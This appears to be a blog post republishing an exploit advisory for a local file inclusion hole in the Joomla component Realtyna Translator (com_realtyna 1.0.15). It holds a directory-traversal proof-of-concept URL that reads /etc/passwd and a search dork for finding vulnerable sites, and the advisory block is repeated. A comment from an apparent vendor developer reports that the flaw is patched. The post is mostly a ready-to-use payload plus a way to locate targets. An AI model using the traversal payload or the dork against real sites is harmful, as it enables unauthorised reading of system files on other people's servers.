- Get link
- X
- Other Apps
[o] Joomla Component Realtyna Translator Local File Inclusion Vulnerability
Software : com_realtyna version 1.0.15
Vendor : http://software.realtyna.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_realtyna&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_realtyna&controller=../../../../../../../../../../etc/passwd
[o] Dork
inurl:"com_realtyna"
Software : com_realtyna version 1.0.15
Vendor : http://software.realtyna.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_realtyna&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_realtyna&controller=../../../../../../../../../../etc/passwd
[o] Dork
inurl:"com_realtyna"
Comments
I as the senior developer in realtyna would like to report that the vulnerability issue (remote file inclusion) is fixed in realtyna products. Our products were developed based on the tutorial on joomla documentation website ( http://docs.joomla.org/Developing_a_Model-View-Controller_Component_-_Part_1 ) and after we received the reports, we checked the site and saw that the code has changed for the controller section of the components.
All our clients can download the latest security patch from http://software.realtyna.com/index.php?option=com_realtynamanager&view=requestlatestversion by
We would be grateful if you remove the report from your website. (http://evilc0de.blogspot.com/2010/04/joomla-component-realtyna-translator.html)
french translation services